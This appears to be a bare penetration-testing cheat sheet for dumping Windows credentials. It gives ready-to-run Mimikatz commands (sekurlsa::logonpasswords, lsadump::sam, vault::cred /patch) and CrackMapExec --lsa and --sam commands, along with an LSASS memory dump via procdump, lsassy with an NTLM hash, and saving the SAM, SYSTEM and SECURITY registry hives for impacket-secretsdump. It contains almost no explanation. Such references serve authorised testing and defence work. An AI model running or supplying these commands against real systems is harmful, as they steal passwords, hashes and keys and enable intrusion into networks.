Last updated 16 days ago
Mimikatz
MimiKatz
CrackMapExec
procdump
lsassy
SecretDump
mimikatz.exe Invoke-Mimikatz.ps1 SharpKatz.exe pypykatz.exe
Invoke-Mimikatz -Command '"sekurlsa::ekeys"' Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
crackmapexec smb <IP> -u <USER> -p <PASS> --lsa
1- Get-Process -Name LSASS 2- .\\procdump.exe -ma <ProcNum> lsass.dmp
lsassy -u <USER> -H <NTLM> -d <domain.full> <IP> --users
1- reg save HKLM\\sam sam 2- reg save HKLM\\system system 3- reg save HKLM\\security security 4- impacket-secretsdump -sam sam -security security -system system LOCAL
Invoke-Mimikatz -Command '"lsadump::sam"'
crackmapexec smb <IP> -u <USER> -p <PASS> --sam
Invoke-Mimikatz -Command '"vault::cred /patch"'